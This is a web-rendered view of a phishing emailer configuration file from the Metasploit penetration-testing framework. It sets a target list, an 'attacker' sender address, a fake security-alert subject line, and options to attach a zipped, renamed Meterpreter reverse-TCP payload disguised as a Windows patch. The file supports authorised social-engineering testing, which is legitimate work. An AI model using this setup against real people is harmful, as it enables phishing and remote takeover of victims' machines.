CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/data/emailer_config.yaml
Views: 1904
1
# YAML:1.0
2
# Configuration file for emailer.rb module
3
# Taken from Jabra spl0it.org
4
#
5
# Emails CSV File (Fname Lname,email)
6
to: /tmp/targets.csv
7
# Email is sent from this address
8
from: attacker@metasf.com
9
# Subject
10
subject: "[SECURITY-ALERT] Critical Windows Vulnerability"
11
# Type ( text or text/html )
12
type: text/html
13
# Msg body file
14
msg_file: /tmp/email_body.txt
15
# Number of seconds to wait before next email
16
wait: 5
17
# Prepend the first name to the email body
18
add_name: true
19
# Add custom signature from file
20
sig: true
21
# Signature file
22
sig_file: /tmp/sig.txt
23
24
#### Attachment Information ####
25
# Add an email attachment (File exploit anyone?)
26
attachment: true
27
# Path to file attachment
28
attachment_file: test.jpg
29
# Name of file attachment
30
attachment_file_name: msf.jpg
31
# Type of attachment
32
attachment_file_type: image/jpeg
33
34
#### Metasploit/Payload Creation ####
35
# create a metasploit payload
36
make_payload: true
37
# zip the payload
38
zip_payload: true
39
# metasploit server ip
40
msf_ip: 127.0.0.1
41
# metasploit server port
42
msf_port: 443
43
# metasploit payload
44
msf_payload: windows/meterpreter/reverse_tcp
45
# metasploit payload
46
msf_filename: MS09-012.exe
47
# metasploit location
48
msf_location: /pentest/exploits/framework3
49
# change the extension
50
msf_change_ext: true
51
# new extension
52
msf_payload_ext: vxe
53
54